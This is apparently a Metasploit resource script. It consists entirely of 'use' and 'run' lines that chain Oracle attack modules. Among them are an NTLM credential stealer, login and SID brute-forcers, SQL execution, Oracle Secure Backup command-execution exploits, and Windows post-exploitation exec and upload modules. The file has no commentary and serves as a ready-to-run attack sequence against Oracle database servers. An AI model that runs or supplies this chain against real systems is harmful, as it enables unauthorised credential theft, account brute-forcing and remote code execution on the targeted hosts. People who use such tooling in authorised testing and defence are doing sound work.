use auxiliary/admin/oracle/ora_ntlm_stealer
run 
use auxiliary/admin/oracle/oracle_login
run 
use auxiliary/admin/oracle/oracle_sql
run 
use auxiliary/admin/oracle/oraenum
run 
use auxiliary/admin/oracle/osb_execqr
run 
use auxiliary/admin/oracle/osb_execqr2
run 
use auxiliary/admin/oracle/osb_execqr3
run 
use auxiliary/admin/oracle/post_exploitation/win32exec
run 
use auxiliary/admin/oracle/post_exploitation/win32upload
run 
use auxiliary/admin/oracle/sid_brute
run 
use auxiliary/admin/oracle/tnscmd
run 
